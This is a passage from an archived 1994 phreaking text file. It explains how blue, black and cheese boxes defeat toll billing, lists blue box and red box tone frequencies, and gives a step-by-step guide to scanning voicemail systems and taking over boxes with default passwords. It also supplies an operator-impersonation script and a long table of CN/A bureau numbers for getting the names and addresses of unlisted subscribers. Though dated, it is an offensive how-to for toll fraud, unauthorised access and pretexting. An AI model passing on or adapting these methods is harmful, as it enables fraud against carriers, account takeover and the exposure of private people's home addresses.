home *** CD-ROM | disk | FTP | other *** search
/ TAP YIPL / TAP_and_YIPL_Collection_CD.iso / PHREAK / GENERAL / OBSPHRK.TXT < prev    next >
Text File  |  1994-05-29  |  172KB  |  3,483 lines

  1. Subject: 3500 lines of obsolete phreaking stuff
  2. Date: Thu May 12 13:13:03 1994
  3.  
  4.  
  5. This is something I put together a few years ago. None of it was               
  6. written by me. I spellchecked it, made a table of contents, and                
  7. converted from 20 column all-caps and removed K0oL spellings.                  
  8.  
  9. I don't want comments, good or bad. I figured somebody might
  10. want this, so I'm posting it, but that the extend of my involvement.
  11.  
  12. I'm sorry about the control-L's. I don't know how to remove them.
  13.  
  14.  
  15.                    xxxxxxxxxxxxxxxxxxxxxxxxxxx
  16.                         Table of Contents
  17.  
  18.  
  19.  
  20. Introduction to hacking. . . . . . . . . . . . . . . . . . . .  1
  21.  
  22. Phone Hacking. . . . . . . . . . . . . . . . . . . . . . . . .  2
  23.      Basic Boxes Technically Explained . . . . . . . . . . . .  3
  24.           (BLUE,3); (BLACK,4); (CHEESE,5)
  25.      Voice mail box hacking. . . . . . . . . . . . . . . . . .  6
  26.      Blue Box Tones. . . . . . . . . . . . . . . . . . . . . .  9
  27.      Customer name and address . . . . . . . . . . . . . . . .  9
  28.      Lock In Trace . . . . . . . . . . . . . . . . . . . . . . 14
  29.      Pinkish Box . . . . . . . . . . . . . . . . . . . . . . . 16
  30.      Pearl Box . . . . . . . . . . . . . . . . . . . . . . . . 17
  31.      Brown Box . . . . . . . . . . . . . . . . . . . . . . . . 19
  32.      Scarlet box . . . . . . . . . . . . . . . . . . . . . . . 20
  33.      Day-Glow. . . . . . . . . . . . . . . . . . . . . . . . . 20
  34.      Gold Box Plans. . . . . . . . . . . . . . . . . . . . . . 22
  35.      Green Box . . . . . . . . . . . . . . . . . . . . . . . . 23
  36.      Blotto Box. . . . . . . . . . . . . . . . . . . . . . . . 23
  37.  
  38. Computer Hacking . . . . . . . . . . . . . . . . . . . . . . . 26
  39.      Tymnet. . . . . . . . . . . . . . . . . . . . . . . . . . 27
  40.      Telenet . . . . . . . . . . . . . . . . . . . . . . . . . 32
  41.      Hacking Unix. . . . . . . . . . . . . . . . . . . . . . . 34
  42.      Primenet. . . . . . . . . . . . . . . . . . . . . . . . . 36
  43.      Hacking DECs. . . . . . . . . . . . . . . . . . . . . . . 44
  44.      Crashing BBSs . . . . . . . . . . . . . . . . . . . . . . 45
  45.      Credit bureaus. . . . . . . . . . . . . . . . . . . . . . 54
  46.      File grabbing on large systems. . . . . . . . . . . . . . 64
  47.  
  48. Potpourri. . . . . . . . . . . . . . . . . . . . . . . . . . . 65
  49.      Bugs. . . . . . . . . . . . . . . . . . . . . . . . . . . 66
  50.      Wiretapping . . . . . . . . . . . . . . . . . . . . . . . 67
  51.      Lunch Box . . . . . . . . . . . . . . . . . . . . . . . . 72
  52.      Beep Time . . . . . . . . . . . . . . . . . . . . . . . . 76
  53.  
  54. Reference. . . . . . . . . . . . . . . . . . . . . . . . . . . 77
  55.      8OO VMB Systems . . . . . . . . . . . . . . . . . . . . . 78
  56.      Extenders . . . . . . . . . . . . . . . . . . . . . . . . 78
  57.      Loops . . . . . . . . . . . . . . . . . . . . . . . . . . 79
  58.      PBXs. . . . . . . . . . . . . . . . . . . . . . . . . . . 79
  59.      Sweeps. . . . . . . . . . . . . . . . . . . . . . . . . . 79
  60.      1-800 modem numbers . . . . . . . . . . . . . . . . . . . 79
  61.      Area Codes by State . . . . . . . . . . . . . . . . . . . 82
  62.                      INTRODUCTION TO HACKING
  63.  
  64. Most people who have never hacked or are beginners think that
  65. hackers are a small community of very knowledgeable computer
  66. "geniuses" that randomly break into systems for fun and then
  67. create havoc or steal information. I will speak of my own views
  68. on hacking which shouldn't reflect the feelings of the entire
  69. hacking community but I would guess a large amount. First of all
  70. hacking is getting more and more risky everyday. Because of this,
  71. hacking for fun isn't as safe as it used to be (although most of
  72. my hacking is for fun). The reason people (people I know) hack is
  73. because we believe in free information exchange. This means that
  74. I should be able to freely access any information that is
  75. available over the modem that I want. There are obvious reasons
  76. why this can't be achieved, but if people have information that
  77. is that sensitive then it should not be put out over the modem.
  78. Now the second and biggest misconception about hacking is how the
  79. hacker actually "hacks". Most people think that hacking is just
  80. basically getting lucky and guessing a password that lets you
  81. into a system. This is *very* untrue. Let us take an example that
  82. you have just broken into the CIA's computer system. So suddenly
  83. you get a -> prompt. Now what do you do?!? This is the difference
  84. between the hacker and some kid that is good at guessing. The kid
  85. may be able to guess a password, but if he doesn't know what to
  86. do once he's in then he might as well have not even hacked the
  87. password at all. So, the main objective of the hacker is to
  88. concentrate on learning how to use a system. After he has done
  89. that then he can figure out ways to get around certain kinds of
  90. security and get to the stuff he wants. So what you should do is
  91. read all the manual's and text files that you can get your hands
  92. on. Because before you can defeat a system, you must know how it
  93. works (this works for life in general). Ok, now you understand
  94. what hacking is and how you should go about learning it. 
  95.  
  96.                           Phone Hacking
  97.                 Basic Boxes Technically Explained
  98.  
  99. BLUE 
  100.    The "Blue Box" was so named because of the color of the first
  101. one found. The design and hardware used in the Blue Box is fairly
  102. sophisticated, and its size varies from a large piece of
  103. equipment to the size of a pack of cigarettes. The Blue Box
  104. contains 12 or 13 buttons or switches that emit multi-frequency
  105. tones characteristic of the tones used in the normal operation of
  106. the telephone toll (long distance) switching network. The Blue
  107. Box enables the user to place free long distance calls by
  108. circumventing toll billing equipment. The Blue Box may be
  109. directly connected to a phone line, or it may be acoustically
  110. coupled to a telephone handset by placing the Blue Box's speaker
  111. next to the transmitter or the telephone handset. To understand
  112. the nature of a fraudulent Blue Box call, t is necessary to
  113. understand the basic operation of the Direct Distance Dialing
  114. (DDD) telephone network. When a DDD call is properly originated,
  115. the calling number is identified as an integral part of
  116. establishing the connection. This may be done either
  117. automatically or, in some cases, by an operator asking the
  118. calling party for his telephone number. This information is
  119. entered on a tape in the Automatic Message Accounting (AMA)
  120. office. This tape also contains the number assigned to the trunk
  121. line over which the call is to be sent. The information relating
  122. to the call contained on the tape includes: called number
  123. identification, time of origination of call, and info that the
  124. called number answered the call and time of disconnect at the end
  125. of the call. Although the tape contains info with respect to many
  126. different calls, the various data entries with respect to a
  127. single call are eventually correlated to provide billing info for
  128. use by your Bell's accounting department. The typical Blue Box
  129. user usually dials a number that will route the call into the
  130. telephone network without charge. For example, the user will very
  131. often call a well-known INWATS (toll-free) customer's number. The
  132. Blue Box user, after gaining this access to the network and, in
  133. effect, "seizing" control and complete dominion over the line,
  134. operates a key on the Blue Box which emits a 2600 Hertz (cycles
  135. per second) tone. This tone causes the switching equipment to
  136. release the connection to the INWATS customer's line. The 2600Hz
  137. tone is a signal that the calling party has hung up. The Blue Box
  138. simulates this condition. However, in fact the local trunk on the
  139. calling party's end is still connected to the toll network. The
  140. Blue Box user now operates the "KP" (Key Pulse) key on the Blue
  141. Box to notify the toll switching equipment that switching signals
  142. are about to be emitted. The user then pushes the "number"
  143. buttons on the Blue Box corresponding to the telephone # being
  144. called. After doing so he/she uses the "ST" (Start) key to tell
  145. the switching equipment that signalling is complete. If the call
  146. is completed, only the portion of the original call prior to the
  147. 'blast' of 2600Hz tone is recorded on the AMA tape. The tones
  148. emitted by the Blue Box are not recorded on the AMA tape.
  149. Therefore, because the original call to the INWATS # is toll-
  150. free, no billing is rendered in connection with the call.
  151. Although the above is a description of a typical Blue Box call
  152. using a common way of getting into the network, the operation of
  153. a Blue Box may vary in any one or all of the following respects:
  154.  
  155. The Blue Box may include a rotary dial to apply the 2600Hz tone
  156. and the switching signals. This type of Blue Box is called a
  157. "dial pulser" or "rotary SF" Blue box. Getting into the DDD toll
  158. network may be done by calling any other toll-free # such as
  159. Universal Directory ASSistance (555-1212) or any number in the
  160. INWATS network, either inter-state or intra-state, working or
  161. non-wrking. Entrance into the DDD toll network may also be in
  162. the form of "short haul" calling. A "short haul" call is a call
  163. to any # which will result in a lesser amount of toll charges
  164. than the charges for the call to be completed by the Blue Box.
  165. For example, a call to Birmingham from Atlanta may cost $.80 for
  166. the first 3 minutes while a call from Atlanta to Los Angeles is
  167. $1.85 for 3 minutes. Thus, a short haul, 3-minute call to
  168. Birmingham from Atlanta, switched by use of a Blue Box to Los
  169. Angeles, would result in a net fraud of $1.05 for a 3 minute
  170. call. A Blue Box may be wired into the telephone line or
  171. acoustically coupled by placing the speaker of the Blue Box near
  172. the transmitter of the phone handset. The Blue Box may even be
  173. built inside a regular Touch-Tone phone, using the phone's push-
  174. buttons for the Blue Box's signalling tones. A magnetic tape
  175. recording may be used to record the Blue Box tones for certain
  176. phone numbers. This way, it's less conspicuous to use since you
  177. just make it look like a walkman or whatever, instead of a box.  
  178.  
  179.    All Blue Boxes, except "dial pulse" or "Rotary SF" Blue Boxes,
  180. must have the following 4 common operating capabilities:
  181.  
  182. It must have signalling capability in the form of a 2600Hz tone.
  183. This tone is used by the toll network to indicate, either by its
  184. presence or its absence, an "on hook" (idle) or "off hook" (busy)
  185. condition of the trunk. The Blue Box must have a "KP" tones that
  186. unlocks or readies the multi-frequency receiver at the called end
  187. to receive the tones corresponding to the called phone #. The
  188. typical Blue Box must be able to emit M tones which are used to
  189. transmit phone #'s over the toll network. Each digit of a phone #
  190. is represented by a combination of 2 tones. For example, the
  191. digit 2 is transmitted by a combination of 700Hz and 1100Hz. The
  192. Blue Box must have an "ST" key which consists of a combination of
  193. 2 tones that tell the equipment at the called end that all digits
  194. have been sent and that the equipment should start switching the
  195. call to the called number.
  196.  
  197. BLACK   
  198.    This Box was named because of the color of the first one
  199. found. It varies in size and usually has one or two switches or
  200. buttons. Attached to the telephone line of a called party, the
  201. Black Box provides toll-free calling *to* that party's line. A
  202. Black Box user tells other people beforehand that they will not
  203. be charged for any call placed to him. The user then operates the
  204. device causing a "non-charge" condition ("no answer" or
  205. "disconnect") to be recorded on the telephone company's billing
  206. equipment. A Black Box is relatively simple to construct and is
  207. much less sophisticated than a Blue Box. NOTE: This will not work
  208. on any type of Electronic Switching Systems, (ESS, DMS100 etc.)
  209.  
  210. CHEESE
  211. This Box was named after the container in which the first one was
  212. found. Its design may be crude or very sophisticated. Its size
  213. varies; one was found the size of a half-dollar. A Cheese Box was
  214. used most often by bookmakers or betters to place wagers without
  215. detection from a remote location. The device inter-connects 2
  216. phone lines, each having different #'s but each terminating at
  217. the same location. In effect, there are 2 phones at the same
  218. location which are linked together through a Cheese Box. It is
  219. usually found in an unoccupied apartment connected to a phone
  220. jack or connecting block. The bookmaker, at some remote location,
  221. dials one of the numbers and stays on the line. Various bettors
  222. dial the other number but are automatically connected with the
  223. book maker by means of the Cheese Box interconnection. If, in
  224. addition to a cheese box, a Black Box is included in the
  225. arrangement, the combined equipment would permit toll-free
  226. calling on either line to the other line. If a police raid were
  227. conducted at the terminating point of the conversations -the
  228. location of the Cheese Box- there would be no evidence of
  229. gambling activity. This device is sometimes difficult to
  230. identify. Law enforcement officials have been advised that when
  231. unusul devices are found associated with telephone connections
  232. the phone company security representatives should be contacted to
  233. assist in identification.
  234.  
  235. (This probably would be good for a BBS, especially with the Black
  236. Box set up. and if you ever decided to take the board down, you
  237. wouldn't have to change your phone #. It also makes it so you
  238. yourself cannot be traced. I am not sure about calling out from
  239. one though.)                      VOICE MAIL BOX HACKING
  240.  
  241. Hello again, and welcome to another £egions f £ucifer text file!
  242. This text file has to do with hacking and scanning VMBs. The
  243. reason I am writing this file is because I am very good at it,
  244. and have had years of experience. In fact I have been called by
  245. MCI for screwing them over by attacking and taking over a whole
  246. damn system with a few friends of mine. Anyway, hacking VMBs is
  247. very simple and basically safe, and not only that but they are
  248. cool to have around. You can give them to friends, you can trade
  249. them for access on bulletin boards, or you can use it for
  250. yourself. As for this 'Tutorial on Hacking VMBs', we will be
  251. talking about what systems to hack, how you go about hacking
  252. them, default passwords, hints on better scanning, and having
  253. your very own box.
  254.  
  255. VMB, in case you don't know, stands for 'Voice Mail Box'. Now a
  256. VMB is like an answering machine. You can use it for all sorts of
  257. things. Most VMB systems are dialed though 800 numbers. People
  258. call up the VMB system that you have a box on, and dial in your
  259. box number and then leave you a message. Whenever you want to
  260. check your box, you just call up, enter your password and read
  261. your messages. Inside a VMB you can do whatever, you can leave
  262. messages to others on the system, you can change your 'Out Going'
  263. message, you can have guest boxes (Explained later), you can have
  264. the box call your house when you get an Urgent message, you can
  265. do a lot of things. In fact, on some systems you can even CALL
  266. OUT through them, so they can be used as a code of sorts! They
  267. are cool to have.
  268.  
  269. You should scan/hack out Virgin Systems, this is another way of
  270. calling a system that hasn't been hack out yet. Also, CINDI
  271. Systems and ASPEN Systems have the best boxes and the most
  272. options that VMB Systems can offer. I will be talking about ASPEN
  273. System today since I know most about those.
  274.  
  275. Okay once you've found your Virgin VMB System, you start to scan.
  276. Just incase you don't know what scanning is, that means you
  277. search for boxes that are hackable (Explained later on). Now you
  278. dial up the system and when it picks up and the bitch starts to
  279. talk, press the "#" key. It will then ask you for your box
  280. number... now there are two different way the ASPEN System can be
  281. configured: 1) a "3 Digit Box Number System" or 2) a "4 Digital
  282. Box Number System". Now lets just say this system is a 3 Digit
  283. System. Okay, when it asks for your Box Number, enter in 999, now
  284. it will say one of three things: [These are known as 'Greeting
  285. Names']
  286.  
  287. 1. John Doe [Box owners name]
  288. 2. "Box Number 999 Is Not a Valid Box Number"
  289. 3. "Box Number 999"
  290. Now, if it either says 1 or 2, go to box number
  291. 998...997...996...995..etc, but if it says 3, then you are lucky,
  292. now it will ask you for your password, now you are probably
  293. saying 'Oh no this is where it gets difficult'... well you are
  294. WRONG! This part is easy. Here is a list of ASPEN Default
  295. Passwords:
  296.  
  297. * We will use box number 666 as an example box #
  298.  [ BN = Box Number ]
  299.  
  300. List of Default Password: Combination  Result
  301.  
  302.                             1-BN           1666
  303.                             BN+1           667
  304.                             0-BN           0666
  305.                             BN-0           6660
  306.          Most Common ──»    BN             666
  307.  
  308. Now enter in a those defaults, try JUST the Box Number first,
  309. ASPENs usually use that most. Now, if you try all those Defaults
  310. and still can not get into that Voice Mail Box, then that means
  311. that the box has been already taken, but the owner hasn't changed
  312. his 'Generic Message', if you don't get in, you will just have to
  313. search until you get in.
  314.  
  315. Okay, once you get your first box, *DO NOT* change anything!!
  316. That will come later. Your first box is, as what is known as a
  317. 'Scanning Box'! What you do with your Scanning Box is this: You
  318. enter "3" from the main commands menu, and it will ask you for
  319. the box number. Now that command is the "Check for Receipt"
  320. command, what it does it check Box #xxx for mail rom you. This
  321. command is very convenient for us VMB Hackers. To use that
  322. command to your advantage, you enter in box a box number and it
  323. will say 1 of the three 'Greeting Names', like before, if it say
  324. #3, then you write down that Box Number and hack it later. But if
  325. it says 1 or 2, then just keep scanning! All boxes with the
  326. number 3 Greeting Name is known as a 'Hackable Box'. Now you keep
  327. scanning until you have gone all the way down to Box number 000
  328. or whatever is the lowest box it supports. Now, once you have
  329. your list this is when all the fun starts! Now you are ready to
  330. hack!
  331.  
  332.  
  333. Hacking Out Your New Found 'Hackable' Boxes:
  334.  
  335. Okay this is the easy part. After you spent most of your time by
  336. scanning the system you should be used to the system and how it
  337. works, that should make hacking the ASPEN all the easier. Now, if
  338. you had a 'Scanning Box', you should know what the default
  339. password was for your Scanning Box. Well if the password for your
  340. Scanning Box was just the Box Number, then *EVERY* other hackable
  341. box should have the SAME default password. VMB Systems have only
  342. one default password, If one box has the BN for a Default PW, the
  343. all the others will too.
  344.  
  345. Okay, you call up the VMB System will the list of 'Hackable'
  346. boxes by your side, and when the bitch is talking, press the "#"
  347. key. When it asks you for your box number, enter in the first box
  348. number on your list. When it asks for your password, enter in the
  349. Default Password Sequence. Now if you don't get into that box,
  350. it's not a problem, just keep going down your list. You should
  351. get into a few. But remember, just because a box is marked
  352. 'Hackable', it doesn't mean you will definitely get into it.
  353.  
  354. Okay, now you hav a few dozen boxes. You can now use you
  355. Scanning Box to do whatever you please.
  356.  
  357. ASPEN Guest Boxes:
  358.  
  359. Once you have a box of your own, you can give out 'Guest Boxes'.
  360. Guest Boxes are like Sub Boxes in your box. In ASPEN you have 4
  361. of them. If you give out Guest Box #1 to John Doe, Mr. Doe can
  362. call in, enter in the password YOU set for him, and leave you
  363. messages, but not only that, you can leave messages to HIM! Which
  364. means, if his is in New York, and you are in California, and
  365. neither of you have codes to call each other, then you can leave
  366. messages thru your 800 VMB. Here is a list and explanation of all
  367. 4 of the Guest Boxes:
  368.  
  369. 0. Main Box      - Your Voice Mail Box!
  370. 1. Guest Box #1  - Can Leave & Receive Messages
  371. 2. Guest Box #2  - Can Leave & Receive Messages
  372. 3. Home Box      -Can Leave & Receive Messages
  373. 4. Secretary Box - Can Check How Many Messages You Have & Receive
  374. Messages
  375.  
  376.  
  377. Hints On Better Scanning:
  378. A lot of people say hacking and scanning for VMBs is too damn
  379. hard... well that's because they are going at it all wrong, they
  380. probably read some lame piece of text file on Hacking VMBs that
  381. was about 500 bytes long. Well, here is a small list of hints on
  382. better scanning and hacking:
  383.  
  384. 1. Do not use a Voice Mail Box hacking/scanning program (i.e.:
  385. VMB v1.0, ASPEN v1.0, VMBHACK v2.3, etc..) 2. Do not hack in
  386. random order (i.e.: B#999, 345, 810, etc) Always hack in order:
  387. 999, 998, 997, 996, 995...000. 3. Try to find out if it's virgin.
  388. The newer the System, the better.
  389. 4. If you have a phone with memory dial, change one entry to the
  390. number of the VMB System. 5. Don't hack the System Managers box
  391. unless you really want to.
  392.  
  393. Ideas of Things To Do With Your Extra Boxes:
  394.  
  395. Well since you can have up to 500 extra Voice Mail Boxes, you
  396. might not know what to do with them, here are a few ideas that
  397. can help you out:
  398.  
  399. 1. Give them to friends
  400. 2. Sell them to friends
  401. 3. Offer them to sysops for better access
  402. 4. Trade them for HSTs or whatever
  403. 5. Use them as a Voice Verifying line (So you don't have to give
  404. out your real voice number to BBSs when you apply!)
  405.  
  406.  
  407.                          Blue Box Tones
  408. In this short section I will attempt to list some tones that Ma
  409. Bell uses and what they are. Well here goes: Blue box
  410. frequencies: 2600 hz - used to  get on/off trunk tone matrix to
  411. use after 2600 hz.
  412.  700:  1  :  2  :  4  :  7  :  11  :  
  413.  900:  +  :  3  :  5  :  8  :  12  : 
  414. 1100:  +  :  +  :  6  :  9  :  KP  : 
  415. 1300:  +  :  +  :  +  :  10 :  KP2 : 
  416. 1500:  +  :  +  :  +  :  +  :  ST  : 
  417.       900 :1100 :1300 :1500 : 1700 :
  418. Use KP to start a call and ST (1500+1700) to stop. Use 2600 HZ to 
  419. disconnect. Red box freqs: 1700 hz and 2200 hz mixed together. A
  420. nickel is 66 ms on (1 beep). A dime is 66ms on, 66ms off, 66ms on
  421. (2 beeps) a quarter is 33ms on, 33ms off repeated 5 times. (Ms =
  422. millisecond). For those of you who don't know, a red box
  423. simulates money being put into a pay phone. You must put in some
  424. money first though (the operator can tell if money was put in but
  425. as to how much she lets the computer answer that. (Yeah for he
  426. computer) TASI locking freq: TASI (time assignment speech
  427. interpolation) is used on satellite trunks, and basically allows
  428. more than one person to use a trunk by putting them on while the
  429. other person isn't talking. Of course, you'd never hear the other
  430. person talking on your trunk. When you start to talk, however,
  431. the TASI controller has to find an open trunk for you. Because of
  432. this, some of your speech is lost (because of the delay in
  433. finding a trunk) this is called clipping. Well, if you were
  434. transmitting data over a trunk, clipping would really mess up the
  435. data. So there is something called a TASI locking frequency which
  436. keeps the TASI from putting anyone else on your trunk or you on
  437. anyone else's trunk. In any case the freq. is 1850 hz. (Sent
  438. before the transmission). Have fun!!!
  439.  
  440.  
  441.                     CUSTOMER NAME AND ADDRESS
  442. The word CN/A stands for Customer's Name and Address ... Your
  443. telephone company has set up little bureaus that will answer the
  444. telephone all day and give numbers out to any authorized Bell
  445. employees of the same city or any other city nationwide. The
  446. bureau keeps everyone on file with their name and address,
  447. INCLUDING those that are unlisted. So if you have a phone number
  448. and you want to find out who owns it and where they live, you can
  449. use this little handy system. In short, it is basically used to
  450. get a persons real name and real address through just having a
  451. phone number!
  452.  
  453. Lets sayyou are constantly being bugged by some little dick and
  454. you don't know his name or address, BUT you have his phone
  455. number.. well you can get his Name & Address just by having his
  456. telephone number! For example, lets say you have this dicks phone
  457. number, and it's (212) 555-1873, then just do the following:
  458.  
  459. Look up the CN/A Number for that NPA (NPA = AREA CODE) in the
  460. list below. For this example, the NPA is 212 and the CN/A number
  461. is 518-471-8111. So then call up the CN/A # (During regular
  462. hours) and throw a line like, "Hello, This is Operator #321 from
  463. the residential service center in California. And I need to get a
  464. CN/A on a customer at 212-555-1873. Thank You."... Make sure not
  465. too sound like a twelve year old dork or try and sound lame with
  466. a really deep voice, just try to sound as real as possible. Okay,
  467. if you got that far, and you sound pretty convincing, then the
  468. CN/A operator should not in any means, ask questions and you
  469. should get all the info you need!
  470.  
  471.  
  472. Here is a list of just about EVERY CN/A Number in the Continental
  473. United States, this list was supplied to Legions of Lucifer by
  474. LawBreaker.
  475. ─────┬─────────┬───────────────┬───────────┬──────┬──────────┐   
  476. Area │ Account │ Telephone     │ Call      │ Time │ Requests │ 
  477. Code │   Code  │ Number        │ Hours     │ Zone │ per call │
  478. ─────┼─────────┼───────────────┼───────────┼──────┼──────────┤ 
  479. 201  │         │ (304)344-7935 │ 8:00-4:10 │  E   │     3    │ 
  480. 202  │         │ (304)343-7016 │ 8:30-4:10 │  E   │     3    │ 
  481. 203  │         │ (203)789-6815 │ 8:10-4:45 │  E   │     7    │ 
  482. 204  │         │ (204)949-0900 │ 8:30-4:45 │  C   │    N/A   │ 
  483. 205  │         │ (205)555-1212 │ 24 hours  │  C   │     2    │ 
  484. 206  │ I47128  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  485. 207  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  486. 208  │ I47127  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  487. 209  │ 1659 or │ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  488. 209  │ 2826    │               │           │      │    N/A   │ 
  489. 212  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  490. 213  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  491. 214  │ SW5167  │ (817)461-4769 │ 8:00-4:50 │  C   │     3    │ 
  492. 215  │         │ (412)633-5600 │ 8:30-5:00 │  E   │     3    │ 
  493. 216  │   161   │ (614)464-0511 │ 8:00-5:00 │  E   │     3    │ 
  494. 217  │   700   │ (217)789-8290 │ 8:00-5:00 │  C   │     2    │ 
  495. 218  │ I47126  │ (402)572-5858 │ 24 hours  │ All  │     2    │ 
  496. 219  │   161   │ (317)265-4834 │ 7:30-4:45 │  E   │     3    │ 
  497. 301  │         │ (304)343-7016 │ 8:00-4:10 │  E   │     3    │ 
  498. 302  │         │ (412)633-5600 │ 8:30-5:00 │  E   │     3    │ 
  499. 303  │ I47126  │ (402)572-5858 │ 8:00-5:00 │  M   │     5    │ 
  500. 304  │ I47127  │ (304)343-1401 │ 8:00-4:10 │  E   │     3    │ 
  501. 305  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  502. 306  │         │ (306)777-2878 │ 8:00-12:00│  M   │    N/A   │ 
  503. 307  │ I47127  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  504. 308  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  505. 309  │   700   │ (217)789-8290 │ 8:00-5:00 │  C   │     2    │ 
  506. 312  │   500   │ (312)796-9600 │ 24hours  │  C   │     2    │ 
  507. 313  │ 53423 or│ (313)424-0900 │ 24 hours  │  E   │    20    │ 
  508. 313  │ 61728   │               │           │      │    N/A   │ 
  509. 314  │ SW1012  │ (816)275-8460 │ 8:30-4:30 │  C   │     3    │ 
  510. 315  │   111   │ (518)471-8111 │ 8:00-4:55 │  E   │    16    │ 
  511. 316  │ SW2019  │ (913)276-6708 │ 8:00-4:45 │  C   │     3    │ 
  512. 317  │   161   │ (317)265-4834 │ 7:30-4:45 │  E   │     3    │ 
  513. 318  │         │ (318)555-1212 │ 24 hours  │  C   │     2    │ 
  514. 319  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  515. 401  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  516. 402  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  517. 403  │         │ (403)493-6383 │ 8:00-4:30 │  M   │    N/A   │ 
  518. 404  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  519. 405  │ SW4070  │ (405)236-6121 │ 7:30-4:15 │  C   │     3    │ 
  520. 406  │ I47127  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  521. 407 │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  522. 408  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  523. 409  │ SW5167  │ (713)961-2397 │ 8:00-5:00 │  C   │     3    │ 
  524. 412  │         │ (412)633-5600 │ 8:30-5:00 │  E   │     3    │ 
  525. 413  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  526. 414  │   767   │ (608)252-6932 │ 8:00-4:30 │  C   │    1-5   │ 
  527. 415  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  528. 416  │         │ (416)443-0542 │ 8:30-5:00 │  E   │    N/A   │ 
  529. 417  │ SW1012  │ (816)275-8460 │ 8:30-4:30 │  C   │     3    │ 
  530. 418  │         │ (514)391-7440 │ 8:30-4:45 │      │    N/A   │ 
  531. 419  │   161   │ (614)464-0511 │ 8:00-5:00 │  E   │     3    │ 
  532. 501  │ SW3006  │ (405)236-6121 │ 7:30-4:30 │  C   │     3    │ 
  533. 502  │         │ (502)555-1212 │ 24 hours  │  E   │     2    │ 
  534. 503  │ I47128  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  535. 504  │         │ (504)555-1212 │ 24 hours  │  C   │     2    │ 
  536. 505  │ I47127  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  537. 506  │         │ (506)694-6541 │8:15-4:30 │  A   │    N/A   │ 
  538. 507  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  539. 508  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  540. 509  │ I47128  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  541. 512  │ SW5167  │ (512)828-2501 │ 9:00-5:00 │  C   │     3    │ 
  542. 513  │   161   │ (614)464-0511 │ 8:00-5:00 │  E   │     3    │ 
  543. 514  │         │ (514)391-7440 │ 8:00-4:30 │  E   │    N/A   │ 
  544. 515  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  545. 516  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  546. 517  │53423 or │ (313)424-0900 │ 24 hours  │  E   │    20    │ 
  547. 517  │ 61728   │               │           │      │    N/A   │ 
  548. 518  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  549. 519  │         │ (416)443-0542 │ 8:30-5:00 │  E   │    N/A   │ 
  550. 601  │         │ (601)555-1212 │ 24 hours  │  C   │     2    │ 
  551. 602  │ I47127  │ (402)572-5858 │ 24 hours  │  M   │     2    │ 
  552. 603  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  553. 604  │         │ Contact Local │           │      │    N/A   │ 
  554. 604  │         │Business Office│           │      │    N/A   │ 
  555. 605  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  556. 606  │         │ (606)555-1212 │ 24 hours  │  E   │     2    │ 
  557. 607  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  558. 608  │   767   │ (608)252-6932 │ 8:30-4:30 │  C   │     5    │ 
  559. 609  │         │ (304)344-7935 │ 8:00-4:10 │  E   │     3    │ 
  560. 612  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  561. 613  │         │ (416)443-0542 │ 8:30-5:00 │  E   │    N/A   │ 
  562. 614  │   161   │ (614)464-0511 │ 8:00-5:00 │  E   │     3    │ 
  563. 615  │ 13402   │ (615)373-7663 │ 8:00-4:10 │  E   │     3    │ 
  564. 616  │53423 or │ (313)424-0900 │ 24 hours  │  E   │    20    │ 
  565. 616  │ 61728   │               │           │      │    N/A   │ 
  566. 617  │   411   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
  567. 618  │   700   │ (217)789-8290 │ 8:00-5:00 │  C   │     2    │ 
  568. 619  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  569. 701  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  570. 702  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  571. 703  │         │ (304)343-1401 │ 8:00-4:10 │  E   │     3    │ 
  572. 704  │ 13402   │ (803)251-0046 │ 8:30-5:00 │  E   │   3-15   │ 
  573. 705  │         │ (416)443-0542 │ 8:30-5:00 │  E   │    N/A   │ 
  574. 707  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  575. 708  │   500   │ (312)796-9600 │ 24 hours  │  C   │     2    │ 
  576. 709  │         │     *NONE*    │           │      │    N/A   │ 
  577. 712  │ I47126  │ (402)572-5858 │ 24 hours  │  C   │     2    │ 
  578. 713  │ SW5167  │ (713)961-2397 │ 8:00-5:00 │  C   │     2    │ 
  579. 714  │1659/2826│ (415)781-5271 │ 7:00-5:00 │  P   │     5    │ 
  580. 715  │   767   │ (608)252-6932 │ 8:00-4:30 │  C   │     5    │ 
  581. 716  │   111   │ (518)471-8111 │ 8:00-5:00 │  E   │    16    │ 
